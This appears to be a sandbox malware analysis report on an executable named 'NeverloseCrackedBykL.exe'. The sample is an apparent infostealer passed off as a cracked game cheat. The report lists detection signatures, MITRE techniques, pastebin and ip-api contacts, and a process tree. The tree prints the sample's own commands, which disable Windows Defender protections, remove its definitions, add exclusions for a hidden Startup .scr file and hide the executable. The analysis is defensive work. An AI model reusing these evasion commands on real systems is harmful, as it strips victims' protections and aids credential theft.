79d5e59e9d29ed290108dd209b3f94cd52ffcdebf7b9d22e6ced41d97c36c52b

Analysis

max time kernel
125s
max time network
127s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
28-04-2024 12:55

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

NeverloseCrackedBykL.exe
Size

8.2MB
MD5

534b6fa0aa29c69569dc8fff7b2320b4
SHA1

0f3d05bad5eb3241f6cdcda5a3eba627566b5587
SHA256

79d5e59e9d29ed290108dd209b3f94cd52ffcdebf7b9d22e6ced41d97c36c52b
SHA512

d1291abfdebf7329c1cd98bb5edd4610e2ff8fb844bc19f64b0842dc3584ec77e0a4930063e480c68213f349848a766f82ffd658a481de58b12aaeeaf25ca2ef
SSDEEP

196608:UrOrYOp6XOshoKMuIkhVastRL5Di3u4CTQ1D7Jz:bYOpOOshouIkPftRL54BRJz

Score

8^/10

spyware stealer upx

Malware Config

Signatures

Downloads MZ/PE file

Drops file in Drivers directory 3 IoCs

Processes:

attrib.exeNeverloseCrackedBykL.exeattrib.exe

description	ioc	process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	NeverloseCrackedBykL.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Executes dropped EXE 1 IoCs

Processes:

rar.exe

pid process

3052 rar.exe

pid	process
3052	rar.exe

Loads dropped DLL 36 IoCs

Processes:

NeverloseCrackedBykL.exeNeverloseCrackedBykL.exe

pid	process
4840	NeverloseCrackedBykL.exe
4840	NeverloseCrackedBykL.exe
4840	NeverloseCrackedBykL.exe
4840	NeverloseCrackedBykL.exe
4840	NeverloseCrackedBykL.exe
4840	NeverloseCrackedBykL.exe
4840	NeverloseCrackedBykL.exe
4840	NeverloseCrackedBykL.exe
4840	NeverloseCrackedBykL.exe
4840	NeverloseCrackedBykL.exe
4840	NeverloseCrackedBykL.exe
4840	NeverloseCrackedBykL.exe
4840	NeverloseCrackedBykL.exe
4840	NeverloseCrackedBykL.exe
4840	NeverloseCrackedBykL.exe
4840	NeverloseCrackedBykL.exe
4840	NeverloseCrackedBykL.exe
4840	NeverloseCrackedBykL.exe
5696	NeverloseCrackedBykL.exe
5696	NeverloseCrackedBykL.exe
5696	NeverloseCrackedBykL.exe
5696	NeverloseCrackedBykL.exe
5696	NeverloseCrackedBykL.exe
5696	NeverloseCrackedBykL.exe
5696	NeverloseCrackedBykL.exe
5696	NeverloseCrackedBykL.exe
5696	NeverloseCrackedBykL.exe
5696	NeverloseCrackedBykL.exe
5696	NeverloseCrackedBykL.exe
5696	NeverloseCrackedBykL.exe
5696	NeverloseCrackedBykL.exe
5696	NeverloseCrackedBykL.exe
5696	NeverloseCrackedBykL.exe
5696	NeverloseCrackedBykL.exe
5696	NeverloseCrackedBykL.exe
5696	NeverloseCrackedBykL.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\_MEI32042\python311.dll	upx
behavioral1/memory/4840-67-0x00007FF8E8970000-0x00007FF8E8F59000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI32042\_ctypes.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI32042\libffi-8.dll	upx
behavioral1/memory/4840-127-0x00007FF8FE050000-0x00007FF8FE05F000-memory.dmp	upx
behavioral1/memory/4840-126-0x00007FF8FC470000-0x00007FF8FC493000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI32042\_socket.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI32042\_queue.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI32042\_lzma.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI32042\_hashlib.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI32042\_decimal.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI32042\_bz2.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI32042\unicodedata.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI32042\sqlite3.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI32042\select.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI32042\libssl-3.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI32042\libcrypto-3.dll	upx
behavioral1/memory/4840-132-0x00007FF8FC140000-0x00007FF8FC16D000-memory.dmp	upx
behavioral1/memory/4840-133-0x00007FF8FC5A0000-0x00007FF8FC5B9000-memory.dmp	upx
behavioral1/memory/4840-134-0x00007FF8F7C50000-0x00007FF8F7C73000-memory.dmp	upx
behavioral1/memory/4840-135-0x00007FF8E87F0000-0x00007FF8E8967000-memory.dmp	upx
behavioral1/memory/4840-136-0x00007FF8FC1E0000-0x00007FF8FC1F9000-memory.dmp	upx
behavioral1/memory/4840-137-0x00007FF8F7C40000-0x00007FF8F7C4D000-memory.dmp	upx
behavioral1/memory/4840-138-0x00007FF8E8970000-0x00007FF8E8F59000-memory.dmp	upx
behavioral1/memory/4840-140-0x00007FF8F7950000-0x00007FF8F7A1D000-memory.dmp	upx
behavioral1/memory/4840-139-0x00007FF8F7A20000-0x00007FF8F7A53000-memory.dmp	upx
behavioral1/memory/4840-142-0x00007FF8E82D0000-0x00007FF8E87F0000-memory.dmp	upx
behavioral1/memory/4840-141-0x00007FF8FC470000-0x00007FF8FC493000-memory.dmp	upx
behavioral1/memory/4840-144-0x00007FF8F73F0000-0x00007FF8F7404000-memory.dmp	upx
behavioral1/memory/4840-145-0x00007FF8F71D0000-0x00007FF8F71DD000-memory.dmp	upx
behavioral1/memory/4840-146-0x00007FF8FC5A0000-0x00007FF8FC5B9000-memory.dmp	upx
behavioral1/memory/4840-147-0x00007FF8E7E80000-0x00007FF8E7F9C000-memory.dmp	upx
behavioral1/memory/4840-148-0x00007FF8F7C50000-0x00007FF8F7C73000-memory.dmp	upx
behavioral1/memory/4840-161-0x00007FF8E87F0000-0x00007FF8E8967000-memory.dmp	upx
behavioral1/memory/4840-282-0x00007FF8FC1E0000-0x00007FF8FC1F9000-memory.dmp	upx
behavioral1/memory/4840-349-0x00007FF8F7950000-0x00007FF8F7A1D000-memory.dmp	upx
behavioral1/memory/4840-354-0x00007FF8F7A20000-0x00007FF8F7A53000-memory.dmp	upx
behavioral1/memory/4840-350-0x00007FF8E82D0000-0x00007FF8E87F0000-memory.dmp	upx
behavioral1/memory/4840-353-0x00007FF8E7E80000-0x00007FF8E7F9C000-memory.dmp	upx
behavioral1/memory/4840-339-0x00007FF8E8970000-0x00007FF8E8F59000-memory.dmp	upx
behavioral1/memory/4840-345-0x00007FF8E87F0000-0x00007FF8E8967000-memory.dmp	upx
behavioral1/memory/4840-340-0x00007FF8FC470000-0x00007FF8FC493000-memory.dmp	upx
behavioral1/memory/4840-391-0x00007FF8FE050000-0x00007FF8FE05F000-memory.dmp	upx
behavioral1/memory/4840-400-0x00007FF8F7A20000-0x00007FF8F7A53000-memory.dmp	upx
behavioral1/memory/4840-390-0x00007FF8E7E80000-0x00007FF8E7F9C000-memory.dmp	upx
behavioral1/memory/4840-399-0x00007FF8F7C40000-0x00007FF8F7C4D000-memory.dmp	upx
behavioral1/memory/4840-398-0x00007FF8FC1E0000-0x00007FF8FC1F9000-memory.dmp	upx
behavioral1/memory/4840-397-0x00007FF8E87F0000-0x00007FF8E8967000-memory.dmp	upx
behavioral1/memory/4840-396-0x00007FF8F7C50000-0x00007FF8F7C73000-memory.dmp	upx
behavioral1/memory/4840-395-0x00007FF8FC5A0000-0x00007FF8FC5B9000-memory.dmp	upx
behavioral1/memory/4840-394-0x00007FF8FC140000-0x00007FF8FC16D000-memory.dmp	upx
behavioral1/memory/4840-393-0x00007FF8F7950000-0x00007FF8F7A1D000-memory.dmp	upx
behavioral1/memory/4840-392-0x00007FF8FC470000-0x00007FF8FC493000-memory.dmp	upx
behavioral1/memory/4840-387-0x00007FF8E82D0000-0x00007FF8E87F0000-memory.dmp	upx
behavioral1/memory/4840-388-0x00007FF8F73F0000-0x00007FF8F7404000-memory.dmp	upx
behavioral1/memory/4840-389-0x00007FF8F71D0000-0x00007FF8F71DD000-memory.dmp	upx
behavioral1/memory/4840-376-0x00007FF8E8970000-0x00007FF8E8F59000-memory.dmp	upx
behavioral1/memory/5696-755-0x00007FF8E84B0000-0x00007FF8E8A99000-memory.dmp	upx
behavioral1/memory/5696-756-0x00007FF8FC250000-0x00007FF8FC273000-memory.dmp	upx
behavioral1/memory/5696-757-0x00007FF8FE040000-0x00007FF8FE04F000-memory.dmp	upx
behavioral1/memory/5696-762-0x00007FF8FC140000-0x00007FF8FC16D000-memory.dmp	upx
behavioral1/memory/5696-763-0x00007FF8FC4A0000-0x00007FF8FC4B9000-memory.dmp	upx
behavioral1/memory/5696-764-0x00007FF8F7CC0000-0x00007FF8F7CE3000-memory.dmp	upx
behavioral1/memory/5696-765-0x00007FF8E8330000-0x00007FF8E84A7000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

75 pastebin.com
76 pastebin.com
77 pastebin.com
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

13 ip-api.com
22 ip-api.com
592 ip-api.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Detects videocard installed 1 TTPs 5 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exe

pid process

2472 WMIC.exe
552 WMIC.exe
3584 WMIC.exe
4176 WMIC.exe
3768 WMIC.exe

flow	ioc
75	pastebin.com
76	pastebin.com
77	pastebin.com

flow	ioc
13	ip-api.com
22	ip-api.com
592	ip-api.com

pid	process
2472	WMIC.exe
552	WMIC.exe
3584	WMIC.exe
4176	WMIC.exe
3768	WMIC.exe

Enumerates processes with tasklist 1 TTPs 10 IoCs

Process Discovery

T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exe

pid	process
5448	tasklist.exe
2304	tasklist.exe
3508	tasklist.exe
5204	tasklist.exe
2716	tasklist.exe
3840	tasklist.exe
3040	tasklist.exe
2792	tasklist.exe
220	tasklist.exe
3928	tasklist.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exechrome.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Gathers system information 1 TTPs 2 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exesysteminfo.exe

pid process

1704 systeminfo.exe
5200 systeminfo.exe
Kills process with taskkill 4 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

3268 taskkill.exe
5244 taskkill.exe
5228 taskkill.exe
5352 taskkill.exe

pid	process
1704	systeminfo.exe
5200	systeminfo.exe

pid	process
3268	taskkill.exe
5244	taskkill.exe
5228	taskkill.exe
5352	taskkill.exe

Modifies data under HKEY_USERS 3 IoCs

Processes:

chrome.exechrome.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133587825942505209"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

3532 PING.EXE

pid	process
3532	PING.EXE

Suspicious behavior: EnumeratesProcesses 28 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exechrome.exepowershell.exepowershell.exepowershell.exe

pid	process
3584	powershell.exe
4612	powershell.exe
4612	powershell.exe
4612	powershell.exe
3584	powershell.exe
4904	powershell.exe
4904	powershell.exe
3260	powershell.exe
3260	powershell.exe
3260	powershell.exe
4212	powershell.exe
4212	powershell.exe
4212	powershell.exe
3188	powershell.exe
3188	powershell.exe
4460	powershell.exe
4460	powershell.exe
2256	powershell.exe
2256	powershell.exe
4764	powershell.exe
4764	powershell.exe
2688	chrome.exe
2688	chrome.exe
5668	powershell.exe
6696	powershell.exe
5668	powershell.exe
6696	powershell.exe
760	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

Processes:

chrome.exe

pid process

2688 chrome.exe
2688 chrome.exe
2688 chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exetasklist.exeWMIC.exepowershell.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	3584	powershell.exe
Token: SeDebugPrivilege	220	tasklist.exe
Token: SeIncreaseQuotaPrivilege	760	WMIC.exe
Token: SeSecurityPrivilege	760	WMIC.exe
Token: SeTakeOwnershipPrivilege	760	WMIC.exe
Token: SeLoadDriverPrivilege	760	WMIC.exe
Token: SeSystemProfilePrivilege	760	WMIC.exe
Token: SeSystemtimePrivilege	760	WMIC.exe
Token: SeProfSingleProcessPrivilege	760	WMIC.exe
Token: SeIncBasePriorityPrivilege	760	WMIC.exe
Token: SeCreatePagefilePrivilege	760	WMIC.exe
Token: SeBackupPrivilege	760	WMIC.exe
Token: SeRestorePrivilege	760	WMIC.exe
Token: SeShutdownPrivilege	760	WMIC.exe
Token: SeDebugPrivilege	760	WMIC.exe
Token: SeSystemEnvironmentPrivilege	760	WMIC.exe
Token: SeRemoteShutdownPrivilege	760	WMIC.exe
Token: SeUndockPrivilege	760	WMIC.exe
Token: SeManageVolumePrivilege	760	WMIC.exe
Token: 33	760	WMIC.exe
Token: 34	760	WMIC.exe
Token: 35	760	WMIC.exe
Token: 36	760	WMIC.exe
Token: SeDebugPrivilege	4612	powershell.exe
Token: SeIncreaseQuotaPrivilege	760	WMIC.exe
Token: SeSecurityPrivilege	760	WMIC.exe
Token: SeTakeOwnershipPrivilege	760	WMIC.exe
Token: SeLoadDriverPrivilege	760	WMIC.exe
Token: SeSystemProfilePrivilege	760	WMIC.exe
Token: SeSystemtimePrivilege	760	WMIC.exe
Token: SeProfSingleProcessPrivilege	760	WMIC.exe
Token: SeIncBasePriorityPrivilege	760	WMIC.exe
Token: SeCreatePagefilePrivilege	760	WMIC.exe
Token: SeBackupPrivilege	760	WMIC.exe
Token: SeRestorePrivilege	760	WMIC.exe
Token: SeShutdownPrivilege	760	WMIC.exe
Token: SeDebugPrivilege	760	WMIC.exe
Token: SeSystemEnvironmentPrivilege	760	WMIC.exe
Token: SeRemoteShutdownPrivilege	760	WMIC.exe
Token: SeUndockPrivilege	760	WMIC.exe
Token: SeManageVolumePrivilege	760	WMIC.exe
Token: 33	760	WMIC.exe
Token: 34	760	WMIC.exe
Token: 35	760	WMIC.exe
Token: 36	760	WMIC.exe
Token: SeIncreaseQuotaPrivilege	552	WMIC.exe
Token: SeSecurityPrivilege	552	WMIC.exe
Token: SeTakeOwnershipPrivilege	552	WMIC.exe
Token: SeLoadDriverPrivilege	552	WMIC.exe
Token: SeSystemProfilePrivilege	552	WMIC.exe
Token: SeSystemtimePrivilege	552	WMIC.exe
Token: SeProfSingleProcessPrivilege	552	WMIC.exe
Token: SeIncBasePriorityPrivilege	552	WMIC.exe
Token: SeCreatePagefilePrivilege	552	WMIC.exe
Token: SeBackupPrivilege	552	WMIC.exe
Token: SeRestorePrivilege	552	WMIC.exe
Token: SeShutdownPrivilege	552	WMIC.exe
Token: SeDebugPrivilege	552	WMIC.exe
Token: SeSystemEnvironmentPrivilege	552	WMIC.exe
Token: SeRemoteShutdownPrivilege	552	WMIC.exe
Token: SeUndockPrivilege	552	WMIC.exe
Token: SeManageVolumePrivilege	552	WMIC.exe
Token: 33	552	WMIC.exe
Token: 34	552	WMIC.exe

Suspicious use of FindShellTrayWindow 27 IoCs

Processes:

chrome.exe

pid	process
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

chrome.exe

pid	process
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe
2688	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

NeverloseCrackedBykL.exeNeverloseCrackedBykL.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 3204 wrote to memory of 4840	3204	NeverloseCrackedBykL.exe	NeverloseCrackedBykL.exe
PID 3204 wrote to memory of 4840	3204	NeverloseCrackedBykL.exe	NeverloseCrackedBykL.exe
PID 4840 wrote to memory of 4288	4840	NeverloseCrackedBykL.exe	cmd.exe
PID 4840 wrote to memory of 4288	4840	NeverloseCrackedBykL.exe	cmd.exe
PID 4840 wrote to memory of 3276	4840	NeverloseCrackedBykL.exe	cmd.exe
PID 4840 wrote to memory of 3276	4840	NeverloseCrackedBykL.exe	cmd.exe
PID 4840 wrote to memory of 4592	4840	NeverloseCrackedBykL.exe	cmd.exe
PID 4840 wrote to memory of 4592	4840	NeverloseCrackedBykL.exe	cmd.exe
PID 4840 wrote to memory of 4444	4840	NeverloseCrackedBykL.exe	cmd.exe
PID 4840 wrote to memory of 4444	4840	NeverloseCrackedBykL.exe	cmd.exe
PID 3276 wrote to memory of 3584	3276	cmd.exe	powershell.exe
PID 3276 wrote to memory of 3584	3276	cmd.exe	powershell.exe
PID 4592 wrote to memory of 220	4592	cmd.exe	tasklist.exe
PID 4592 wrote to memory of 220	4592	cmd.exe	tasklist.exe
PID 4444 wrote to memory of 760	4444	cmd.exe	WMIC.exe
PID 4444 wrote to memory of 760	4444	cmd.exe	WMIC.exe
PID 4288 wrote to memory of 4612	4288	cmd.exe	powershell.exe
PID 4288 wrote to memory of 4612	4288	cmd.exe	powershell.exe
PID 4840 wrote to memory of 4400	4840	NeverloseCrackedBykL.exe	cmd.exe
PID 4840 wrote to memory of 4400	4840	NeverloseCrackedBykL.exe	cmd.exe
PID 4400 wrote to memory of 4276	4400	cmd.exe	reg.exe
PID 4400 wrote to memory of 4276	4400	cmd.exe	reg.exe
PID 4840 wrote to memory of 4308	4840	NeverloseCrackedBykL.exe	cmd.exe
PID 4840 wrote to memory of 4308	4840	NeverloseCrackedBykL.exe	cmd.exe
PID 4308 wrote to memory of 4300	4308	cmd.exe	reg.exe
PID 4308 wrote to memory of 4300	4308	cmd.exe	reg.exe
PID 4840 wrote to memory of 4212	4840	NeverloseCrackedBykL.exe	powershell.exe
PID 4840 wrote to memory of 4212	4840	NeverloseCrackedBykL.exe	powershell.exe
PID 4212 wrote to memory of 2472	4212	cmd.exe	WMIC.exe
PID 4212 wrote to memory of 2472	4212	cmd.exe	WMIC.exe
PID 4840 wrote to memory of 1632	4840	NeverloseCrackedBykL.exe	cmd.exe
PID 4840 wrote to memory of 1632	4840	NeverloseCrackedBykL.exe	cmd.exe
PID 1632 wrote to memory of 552	1632	cmd.exe	WMIC.exe
PID 1632 wrote to memory of 552	1632	cmd.exe	WMIC.exe
PID 4840 wrote to memory of 4880	4840	NeverloseCrackedBykL.exe	cmd.exe
PID 4840 wrote to memory of 4880	4840	NeverloseCrackedBykL.exe	cmd.exe
PID 4840 wrote to memory of 4748	4840	NeverloseCrackedBykL.exe	cmd.exe
PID 4840 wrote to memory of 4748	4840	NeverloseCrackedBykL.exe	cmd.exe
PID 4880 wrote to memory of 4080	4880	cmd.exe	attrib.exe
PID 4880 wrote to memory of 4080	4880	cmd.exe	attrib.exe
PID 4748 wrote to memory of 4904	4748	cmd.exe	powershell.exe
PID 4748 wrote to memory of 4904	4748	cmd.exe	powershell.exe
PID 4840 wrote to memory of 2328	4840	NeverloseCrackedBykL.exe	cmd.exe
PID 4840 wrote to memory of 2328	4840	NeverloseCrackedBykL.exe	cmd.exe
PID 4840 wrote to memory of 2256	4840	NeverloseCrackedBykL.exe	cmd.exe
PID 4840 wrote to memory of 2256	4840	NeverloseCrackedBykL.exe	cmd.exe
PID 2328 wrote to memory of 3840	2328	cmd.exe	tasklist.exe
PID 2328 wrote to memory of 3840	2328	cmd.exe	tasklist.exe
PID 2256 wrote to memory of 3928	2256	cmd.exe	tasklist.exe
PID 2256 wrote to memory of 3928	2256	cmd.exe	tasklist.exe
PID 4840 wrote to memory of 884	4840	NeverloseCrackedBykL.exe	cmd.exe
PID 4840 wrote to memory of 884	4840	NeverloseCrackedBykL.exe	cmd.exe
PID 4840 wrote to memory of 2020	4840	NeverloseCrackedBykL.exe	cmd.exe
PID 4840 wrote to memory of 2020	4840	NeverloseCrackedBykL.exe	cmd.exe
PID 4840 wrote to memory of 3464	4840	NeverloseCrackedBykL.exe	cmd.exe
PID 4840 wrote to memory of 3464	4840	NeverloseCrackedBykL.exe	cmd.exe
PID 2020 wrote to memory of 3260	2020	cmd.exe	powershell.exe
PID 2020 wrote to memory of 3260	2020	cmd.exe	powershell.exe
PID 4840 wrote to memory of 1712	4840	NeverloseCrackedBykL.exe	cmd.exe
PID 4840 wrote to memory of 1712	4840	NeverloseCrackedBykL.exe	cmd.exe
PID 3464 wrote to memory of 2792	3464	cmd.exe	tasklist.exe
PID 3464 wrote to memory of 2792	3464	cmd.exe	tasklist.exe
PID 4840 wrote to memory of 4440	4840	NeverloseCrackedBykL.exe	cmd.exe
PID 4840 wrote to memory of 4440	4840	NeverloseCrackedBykL.exe	cmd.exe

Views/modifies file attributes 1 TTPs 6 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid process

4080 attrib.exe
3608 attrib.exe
736 attrib.exe
432 attrib.exe
4944 attrib.exe
6400 attrib.exe

pid	process
4080	attrib.exe
3608	attrib.exe
736	attrib.exe
432	attrib.exe
4944	attrib.exe
6400	attrib.exe

C:\Users\Admin\AppData\Local\Temp\NeverloseCrackedBykL.exe
"C:\Users\Admin\AppData\Local\Temp\NeverloseCrackedBykL.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3204

C:\Users\Admin\AppData\Local\Temp\NeverloseCrackedBykL.exe
"C:\Users\Admin\AppData\Local\Temp\NeverloseCrackedBykL.exe"
2⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4840

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\NeverloseCrackedBykL.exe'"
3⤵
- Suspicious use of WriteProcessMemory
PID:4288

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\NeverloseCrackedBykL.exe'
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4612

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
3⤵
- Suspicious use of WriteProcessMemory
PID:3276

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3584

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
3⤵
- Suspicious use of WriteProcessMemory
PID:4592

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:220

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
3⤵
- Suspicious use of WriteProcessMemory
PID:4444

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:760

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
3⤵
- Suspicious use of WriteProcessMemory
PID:4400

C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
4⤵
PID:4276

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
3⤵
- Suspicious use of WriteProcessMemory
PID:4308

C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
4⤵
PID:4300

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
3⤵
- Suspicious use of WriteProcessMemory
PID:4212

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
4⤵
- Detects videocard installed
PID:2472

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
3⤵
- Suspicious use of WriteProcessMemory
PID:1632

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
4⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:552

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\NeverloseCrackedBykL.exe""
3⤵
- Suspicious use of WriteProcessMemory
PID:4880

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Temp\NeverloseCrackedBykL.exe"
4⤵
- Views/modifies file attributes
PID:4080

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌ .scr'"
3⤵
- Suspicious use of WriteProcessMemory
PID:4748

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌ .scr'
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4904

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
3⤵
- Suspicious use of WriteProcessMemory
PID:2328

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
4⤵
- Enumerates processes with tasklist
PID:3840

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
3⤵
- Suspicious use of WriteProcessMemory
PID:2256

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
4⤵
- Enumerates processes with tasklist
PID:3928

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
3⤵
PID:884

